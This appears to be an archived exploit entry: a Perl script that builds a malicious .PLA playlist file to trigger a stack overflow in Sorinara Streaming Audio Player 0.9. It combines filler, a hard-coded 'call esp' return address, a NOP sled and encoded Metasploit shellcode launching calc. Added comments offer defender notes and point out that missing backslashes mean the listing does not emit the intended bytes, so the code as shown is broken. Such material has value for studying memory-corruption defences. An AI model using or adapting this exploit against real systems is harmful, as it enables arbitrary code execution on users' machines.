
# Title : Sorinara Streaming Audio Player 0.9 (.PLA) Stack Overflow Exploit
# Published : 2009-05-07
# Author : Hakxer


# by : Hakxer -> EgY Coders Team
# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit
# hakxer.1@gmail.com
# Greetz : Allah
#                , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends
##########################################################################
 
# Proof-of-concept file generator for the .PLA stack overflow named in the
# header. It writes four strings to exploit.pla, in this order:
# filler, return-address value, NOP padding, payload.
#
# NOTE(review): as rendered on this page the "xNN" sequences carry no
# backslash, so Perl treats each one as three literal characters rather than
# one byte. The per-line comments below describe the layout the author's own
# annotations state, not what this listing emits byte for byte.
#
# Defender notes:
#  - The script only shows that 288 filler units precede the value meant to
#    replace a saved return address; the root cause is presumably an
#    unbounded copy of playlist data into a fixed-size stack buffer in the
#    player -- confirm against the vendor's code or a debugger trace.
#  - The return value is one hard-coded address, so the PoC depends on a
#    specific module being loaded at a fixed location. ASLR, DEP/NX and
#    stack cookies are the standard mitigations for this overwrite style.
#  - For triage, a .pla file that begins with a long run of one repeated
#    character followed by non-playlist data is a reasonable heuristic.

# Filler: the string "x41" repeated 288 times (intended as padding up to the
# saved return address).
$buff="x41" x 288;
# Value intended to overwrite the return address; the author annotates it as
# the address of a "call esp" instruction.
$ret="x77xE9xAEx59"; # 0x77E9AE59      call esp
# Padding placed between the return value and the payload ("x90" x 20;
# 0x90 is the x86 NOP opcode).
$nops="x90" x 20;
# Payload. Per the author's comment it is a Metasploit-generated win32_exec
# stub, alphanumeric-encoded, whose command is "calc" (a harmless
# demonstration that code execution was reached).
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x50x4bx48x45x44x4ex43x4bx48x4ex37".
"x45x50x4ax47x41x50x4fx4ex4bx48x4fx44x4ax31x4bx38".
"x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x43x4bx48".
"x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x42x46x50x45x37x45x4ex4bx38".
"x4fx55x46x52x41x30x4bx4ex48x56x4bx38x4ex30x4bx34".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex41x4bx58".
"x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43".
"x42x4cx46x46x4bx58x42x54x42x53x45x38x42x4cx4ax37".
"x4ex50x4bx38x42x44x4ex50x4bx58x42x47x4ex31x4dx4a".
"x4bx58x4ax56x4ax30x4bx4ex49x50x4bx48x42x58x42x4b".
"x42x50x42x30x42x50x4bx38x4ax46x4ex43x4fx55x41x53".
"x48x4fx42x36x48x35x49x38x4ax4fx43x48x42x4cx4bx47".
"x42x35x4ax36x42x4fx4cx48x46x50x4fx55x4ax56x4ax39".
"x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x56x42x50x5a";
# Output: two-argument open on a bareword handle, in append mode ('>>'), with
# no check of the result. A pre-existing exploit.pla is extended rather than
# replaced, and a failed open is not reported by this script.
open(MYFILE,'>>exploit.pla');
# The four parts are written back to back with no separators.
print MYFILE $buff;
print MYFILE $ret;
print MYFILE $nops;
print MYFILE $shellcode;
close(MYFILE);
